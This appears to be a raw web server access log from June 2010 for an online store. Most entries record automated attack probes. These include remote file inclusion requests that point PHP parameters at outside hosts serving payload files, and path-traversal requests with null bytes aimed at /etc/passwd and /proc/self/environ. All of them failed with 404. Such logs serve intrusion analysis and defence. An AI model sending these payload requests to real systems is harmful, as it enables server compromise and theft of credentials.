85.235.154.15 - - [21/Jun/2010:00:34:04 -0400] "GET /logs/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.howtolisten.kr/lct/flashmenu/auto1.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
85.235.154.15 - - [21/Jun/2010:00:34:04 -0400] "GET /components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.howtolisten.kr/lct/flashmenu/auto1.txt?? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
85.235.154.15 - - [21/Jun/2010:00:34:04 -0400] "GET /logs/access_log.Q109101300%20%20/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.howtolisten.kr/lct/flashmenu/auto1.txt?? HTTP/1.1" 404 285 "-" "Mozilla/5.0"
85.235.154.15 - - [21/Jun/2010:00:34:04 -0400] "GET /logs/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.howtolisten.kr/lct/flashmenu/auto1.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
203.101.64.67 - - [21/Jun/2010:00:34:15 -0400] "GET /images/cat_collapse.gif HTTP/1.1" 200 76 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+LJ237E36D03A4C500743C08L+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6.5; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
85.235.154.15 - - [21/Jun/2010:00:34:37 -0400] "GET /logs/access_log.Q109100900%20%20/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.howtolisten.kr/lct/flashmenu/auto1.txt?? HTTP/1.1" 404 285 "-" "Mozilla/5.0"
85.235.154.15 - - [21/Jun/2010:00:34:38 -0400] "GET /logs/access_log.Q109100900%20%20/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.howtolisten.kr/lct/flashmenu/auto1.txt?? HTTP/1.1" 404 285 "-" "Mozilla/5.0"
67.59.156.163 - - [21/Jun/2010:00:34:39 -0400] "GET /components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.howtolisten.kr/lct/flashmenu/auto1.txt?? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
67.59.156.163 - - [21/Jun/2010:00:34:40 -0400] "GET /logs/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.howtolisten.kr/lct/flashmenu/auto1.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
67.59.156.163 - - [21/Jun/2010:00:34:40 -0400] "GET /logs/access_log.Q109101300%20%20/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.howtolisten.kr/lct/flashmenu/auto1.txt?? HTTP/1.1" 404 285 "-" "Mozilla/5.0"
67.59.156.163 - - [21/Jun/2010:00:34:43 -0400] "GET /components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.howtolisten.kr/lct/flashmenu/auto1.txt?? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
67.59.156.163 - - [21/Jun/2010:00:34:43 -0400] "GET /logs/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.howtolisten.kr/lct/flashmenu/auto1.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
67.59.156.163 - - [21/Jun/2010:00:34:44 -0400] "GET /logs/access_log.Q109101300%20%20/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.howtolisten.kr/lct/flashmenu/auto1.txt?? HTTP/1.1" 404 285 "-" "Mozilla/5.0"
203.101.64.67 - - [21/Jun/2010:00:34:46 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+LJ237E3650FD435008D4C08L+M37+ENG HTTP/1.1" 200 50236 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+LJ237E36D03A4C500743C08L+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6.5; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
203.101.64.67 - - [21/Jun/2010:00:34:48 -0400] "GET /images/pf-a.gif HTTP/1.1" 200 798 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+LJ237E3650FD435008D4C08L+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6.5; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
203.101.64.67 - - [21/Jun/2010:00:34:48 -0400] "GET /images/items/0034300_THUMB.JPG HTTP/1.1" 200 1648 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+LJ237E3650FD435008D4C08L+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6.5; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
203.101.64.67 - - [21/Jun/2010:00:34:49 -0400] "GET /images/space.gif HTTP/1.1" 200 43 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+LJ237E3650FD435008D4C08L+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6.5; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
203.101.64.67 - - [21/Jun/2010:00:35:14 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+LJ237E3650FD435008D4C08L+M37+ENG HTTP/1.1" 200 47597 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+LJ237E36D03A4C500743C08L+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6.5; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
203.101.64.67 - - [21/Jun/2010:00:35:16 -0400] "GET /images/items/4811002_THUMB.JPG HTTP/1.1" 200 1885 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+LJ237E3650FD435008D4C08L+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6.5; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
203.101.64.67 - - [21/Jun/2010:00:35:16 -0400] "GET /images/items/0031402_THUMB.JPG HTTP/1.1" 200 1588 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+LJ237E3650FD435008D4C08L+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6.5; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
67.59.156.163 - - [21/Jun/2010:00:35:44 -0400] "GET /logs/access_log.Q109100900%20%20/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.howtolisten.kr/lct/flashmenu/auto1.txt?? HTTP/1.1" 404 285 "-" "Mozilla/5.0"
67.59.156.163 - - [21/Jun/2010:00:35:48 -0400] "GET /logs/access_log.Q109100900%20%20/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.howtolisten.kr/lct/flashmenu/auto1.txt?? HTTP/1.1" 404 285 "-" "Mozilla/5.0"
95.108.245.251 - - [21/Jun/2010:00:36:55 -0400] "GET /logs/access_log.Q110052800 HTTP/1.1" 304 - "-" "Yandex/1.01.001 (compatible; Win16; I)"
188.72.70.56 - - [21/Jun/2010:00:37:13 -0400] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 208 "-" "libwww-perl/5.834"
188.72.70.56 - - [21/Jun/2010:00:37:13 -0400] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 208 "-" "libwww-perl/5.834"
188.72.70.56 - - [21/Jun/2010:00:37:14 -0400] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 208 "-" "libwww-perl/5.834"
188.72.70.56 - - [21/Jun/2010:00:37:15 -0400] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 208 "-" "libwww-perl/5.834"
188.72.70.56 - - [21/Jun/2010:00:37:28 -0400] "GET //index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 208 "-" "libwww-perl/5.834"
188.72.70.56 - - [21/Jun/2010:00:37:31 -0400] "GET //index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 208 "-" "libwww-perl/5.834"
188.72.70.56 - - [21/Jun/2010:00:38:28 -0400] "GET //index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 208 "-" "libwww-perl/5.834"
188.72.70.56 - - [21/Jun/2010:00:38:31 -0400] "GET /logs/access_log.Q110061500//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 235 "-" "libwww-perl/5.834"
188.72.70.56 - - [21/Jun/2010:00:38:31 -0400] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 208 "-" "libwww-perl/5.834"
188.72.70.56 - - [21/Jun/2010:00:38:32 -0400] "GET /logs//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 213 "-" "libwww-perl/5.834"
195.22.10.103 - - [21/Jun/2010:00:39:05 -0400] "GET /logs/access_log.Q110060700//pingserver.php HTTP/1.1" 404 240 "-" "libwww-perl/5.805"
195.22.10.103 - - [21/Jun/2010:00:39:06 -0400] "GET //pingserver.php HTTP/1.1" 404 213 "-" "libwww-perl/5.805"
195.22.10.103 - - [21/Jun/2010:00:39:06 -0400] "GET /logs//pingserver.php HTTP/1.1" 404 218 "-" "libwww-perl/5.805"
195.22.10.103 - - [21/Jun/2010:00:39:12 -0400] "GET /logs/access_log.Q110060700//pingserver.php HTTP/1.1" 404 240 "-" "libwww-perl/5.805"
195.22.10.103 - - [21/Jun/2010:00:39:12 -0400] "GET //pingserver.php HTTP/1.1" 404 213 "-" "libwww-perl/5.805"
195.22.10.103 - - [21/Jun/2010:00:39:12 -0400] "GET /logs//pingserver.php HTTP/1.1" 404 218 "-" "libwww-perl/5.805"
195.22.10.103 - - [21/Jun/2010:00:39:15 -0400] "GET /logs/error_log.Q110060700//pingserver.php HTTP/1.1" 404 239 "-" "libwww-perl/5.805"
75.125.138.2 - - [21/Jun/2010:00:39:18 -0400] "GET //weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
75.125.138.2 - - [21/Jun/2010:00:39:18 -0400] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
75.125.138.2 - - [21/Jun/2010:00:39:18 -0400] "GET /logs/access_log.Q109080600//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
75.125.138.2 - - [21/Jun/2010:00:39:20 -0400] "GET //weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
195.22.10.103 - - [21/Jun/2010:00:39:20 -0400] "GET /logs/error_log.Q110060700//pingserver.php HTTP/1.1" 404 239 "-" "libwww-perl/5.805"
75.125.138.2 - - [21/Jun/2010:00:39:20 -0400] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
75.125.138.2 - - [21/Jun/2010:00:39:20 -0400] "GET /logs/access_log.Q109080600//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
75.125.138.2 - - [21/Jun/2010:00:39:27 -0400] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
75.125.138.2 - - [21/Jun/2010:00:39:27 -0400] "GET //weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
75.125.138.2 - - [21/Jun/2010:00:39:27 -0400] "GET /logs/access_log.Q109080600%20%20//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
75.125.138.2 - - [21/Jun/2010:00:39:28 -0400] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
75.125.138.2 - - [21/Jun/2010:00:39:28 -0400] "GET /logs/access_log.Q109080600%20%20//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
75.125.138.2 - - [21/Jun/2010:00:39:28 -0400] "GET //weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
75.125.138.2 - - [21/Jun/2010:00:39:30 -0400] "GET /logs/access_log.Q109060700//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
75.125.138.2 - - [21/Jun/2010:00:39:32 -0400] "GET /logs/access_log.Q109060700//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
75.125.138.2 - - [21/Jun/2010:00:39:36 -0400] "GET /logs/access_log.Q109060700%20%20//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
75.125.138.2 - - [21/Jun/2010:00:39:38 -0400] "GET /logs/access_log.Q109060700%20%20//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
209.59.12.99 - - [21/Jun/2010:00:39:57 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
188.72.70.56 - - [21/Jun/2010:00:40:22 -0400] "GET //index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 208 "-" "libwww-perl/5.834"
188.72.70.56 - - [21/Jun/2010:00:40:23 -0400] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 208 "-" "libwww-perl/5.834"
188.72.70.56 - - [21/Jun/2010:00:40:23 -0400] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 208 "-" "libwww-perl/5.834"
188.72.70.56 - - [21/Jun/2010:00:40:23 -0400] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 208 "-" "libwww-perl/5.834"
188.72.70.56 - - [21/Jun/2010:00:40:23 -0400] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 208 "-" "libwww-perl/5.834"
188.72.70.56 - - [21/Jun/2010:00:40:24 -0400] "GET //index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 208 "-" "libwww-perl/5.834"
75.125.138.2 - - [21/Jun/2010:00:40:36 -0400] "GET //weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
75.125.138.2 - - [21/Jun/2010:00:40:36 -0400] "GET /logs/access_log.Q109080600//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
75.125.138.2 - - [21/Jun/2010:00:40:36 -0400] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
75.125.138.2 - - [21/Jun/2010:00:40:40 -0400] "GET //weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
75.125.138.2 - - [21/Jun/2010:00:40:40 -0400] "GET /logs/access_log.Q109080600//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
75.125.138.2 - - [21/Jun/2010:00:40:40 -0400] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
75.125.138.2 - - [21/Jun/2010:00:40:45 -0400] "GET /logs/access_log.Q109060700//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
75.125.138.2 - - [21/Jun/2010:00:40:45 -0400] "GET /logs/access_log.Q109060700//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
75.125.138.2 - - [21/Jun/2010:00:40:47 -0400] "GET //weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
75.125.138.2 - - [21/Jun/2010:00:40:47 -0400] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
75.125.138.2 - - [21/Jun/2010:00:40:47 -0400] "GET /logs/access_log.Q109111400//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
66.249.71.206 - - [21/Jun/2010:00:41:12 -0400] "GET /images/items/5091000_FULL.JPG HTTP/1.1" 304 - "-" "Googlebot-Image/1.0"
188.72.70.56 - - [21/Jun/2010:00:41:39 -0400] "GET //index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 208 "-" "libwww-perl/5.834"
195.22.10.103 - - [21/Jun/2010:00:43:24 -0400] "GET //pingserver.php HTTP/1.1" 404 213 "-" "libwww-perl/5.805"
195.22.10.103 - - [21/Jun/2010:00:43:24 -0400] "GET //pingserver.php HTTP/1.1" 404 213 "-" "libwww-perl/5.805"
66.249.71.206 - - [21/Jun/2010:00:43:47 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+LG28ABC5372A6D00069B300L+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
94.136.63.119 - - [21/Jun/2010:00:44:15 -0400] "GET /logs//skin/zero_vote/ask_password.php?http://inmobiliariapymsa.com/cache/test.gif?? HTTP/1.1" 404 235 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox"
94.136.63.119 - - [21/Jun/2010:00:44:15 -0400] "GET //skin/zero_vote/ask_password.php?http://inmobiliariapymsa.com/cache/test.gif?? HTTP/1.1" 404 230 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox"
94.136.63.119 - - [21/Jun/2010:00:44:15 -0400] "GET /logs//skin/zero_vote/ask_password.php?http://inmobiliariapymsa.com/cache/test.gif?? HTTP/1.1" 404 235 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox"
94.136.63.119 - - [21/Jun/2010:00:44:15 -0400] "GET //skin/zero_vote/ask_password.php?http://inmobiliariapymsa.com/cache/test.gif?? HTTP/1.1" 404 230 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox"
202.130.32.19 - - [21/Jun/2010:00:45:46 -0400] "GET //pingserver.php HTTP/1.1" 404 213 "-" "libwww-perl/5.831"
188.72.70.56 - - [21/Jun/2010:00:46:23 -0400] "GET /logs/access_log.Q110061300//index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 235 "-" "libwww-perl/5.834"
188.72.70.56 - - [21/Jun/2010:00:46:24 -0400] "GET //index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 208 "-" "libwww-perl/5.834"
188.72.70.56 - - [21/Jun/2010:00:46:24 -0400] "GET /logs//index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 213 "-" "libwww-perl/5.834"
188.72.70.56 - - [21/Jun/2010:00:46:45 -0400] "GET /logs/error_log.Q110060500//index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 234 "-" "libwww-perl/5.834"
62.44.82.118 - - [21/Jun/2010:00:47:04 -0400] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 208 "-" "libwww-perl/5.803"
124.38.187.59 - - [21/Jun/2010:00:47:32 -0400] "GET /logs/access_log.Q110060700//pingserver.php HTTP/1.1" 404 240 "-" "libwww-perl/5.805"
124.38.187.59 - - [21/Jun/2010:00:47:32 -0400] "GET //pingserver.php HTTP/1.1" 404 213 "-" "libwww-perl/5.805"
188.72.70.56 - - [21/Jun/2010:00:47:33 -0400] "GET /logs/access_log.Q110060500//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 235 "-" "libwww-perl/5.834"
124.38.187.59 - - [21/Jun/2010:00:47:33 -0400] "GET /logs//pingserver.php HTTP/1.1" 404 218 "-" "libwww-perl/5.805"
188.72.70.56 - - [21/Jun/2010:00:47:33 -0400] "GET //index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 208 "-" "libwww-perl/5.834"
188.72.70.56 - - [21/Jun/2010:00:47:33 -0400] "GET /logs//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 213 "-" "libwww-perl/5.834"
124.38.187.59 - - [21/Jun/2010:00:47:44 -0400] "GET /logs/error_log.Q110060700//pingserver.php HTTP/1.1" 404 239 "-" "libwww-perl/5.805"
188.72.70.56 - - [21/Jun/2010:00:47:50 -0400] "GET /logs/access_log.Q110060500//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 235 "-" "libwww-perl/5.834"
188.72.70.56 - - [21/Jun/2010:00:47:50 -0400] "GET //index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 208 "-" "libwww-perl/5.834"
188.72.70.56 - - [21/Jun/2010:00:47:50 -0400] "GET /logs//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 213 "-" "libwww-perl/5.834"
121.78.118.123 - - [21/Jun/2010:00:48:09 -0400] "GET /logs/access_log.Q109052700/index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
121.78.118.123 - - [21/Jun/2010:00:48:09 -0400] "GET /index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 207 "-" "libwww-perl/5.805"
121.78.118.123 - - [21/Jun/2010:00:48:10 -0400] "GET /logs/index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 212 "-" "libwww-perl/5.805"
202.130.32.19 - - [21/Jun/2010:00:48:19 -0400] "GET /logs/access_log.Q110060700//pingserver.php HTTP/1.1" 404 240 "-" "libwww-perl/5.831"
202.130.32.19 - - [21/Jun/2010:00:48:19 -0400] "GET //pingserver.php HTTP/1.1" 404 213 "-" "libwww-perl/5.831"
202.130.32.19 - - [21/Jun/2010:00:48:20 -0400] "GET /logs//pingserver.php HTTP/1.1" 404 218 "-" "libwww-perl/5.831"
121.78.118.123 - - [21/Jun/2010:00:48:26 -0400] "GET /index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 207 "-" "libwww-perl/5.805"
202.130.32.19 - - [21/Jun/2010:00:48:33 -0400] "GET /logs/error_log.Q110060700//pingserver.php HTTP/1.1" 404 239 "-" "libwww-perl/5.831"
209.59.12.99 - - [21/Jun/2010:00:50:18 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
188.72.70.56 - - [21/Jun/2010:00:50:26 -0400] "GET /logs/error_log.Q110060500//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 234 "-" "libwww-perl/5.834"
188.72.70.56 - - [21/Jun/2010:00:50:42 -0400] "GET /logs/error_log.Q110060500//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 234 "-" "libwww-perl/5.834"
95.156.233.139 - - [21/Jun/2010:00:50:52 -0400] "GET //jsloader.php?files[]=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 211 "-" "libwww-perl/5.813"
67.195.114.223 - - [21/Jun/2010:00:51:22 -0400] "GET /images/_notes/nav04_conven_over.jpg.mno HTTP/1.0" 200 258 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
121.78.118.123 - - [21/Jun/2010:00:52:16 -0400] "GET /index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 207 "-" "libwww-perl/5.805"
69.73.166.6 - - [21/Jun/2010:00:53:34 -0400] "GET /logs/access_log.Q110060900//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 235 "-" "libwww-perl/5.832"
69.73.166.6 - - [21/Jun/2010:00:53:35 -0400] "GET /logs/access_log.Q110060900//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=../etc/passwd%00 HTTP/1.1" 404 235 "-" "libwww-perl/5.832"
69.73.166.6 - - [21/Jun/2010:00:53:36 -0400] "GET /logs/access_log.Q110060900//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=../../etc/passwd%00 HTTP/1.1" 404 235 "-" "libwww-perl/5.832"
69.73.166.6 - - [21/Jun/2010:00:53:37 -0400] "GET /logs/access_log.Q110060900//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=../../../etc/passwd%00 HTTP/1.1" 404 235 "-" "libwww-perl/5.832"
69.73.166.6 - - [21/Jun/2010:00:53:38 -0400] "GET /logs/access_log.Q110060900//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=../../../../etc/passwd%00 HTTP/1.1" 404 235 "-" "libwww-perl/5.832"
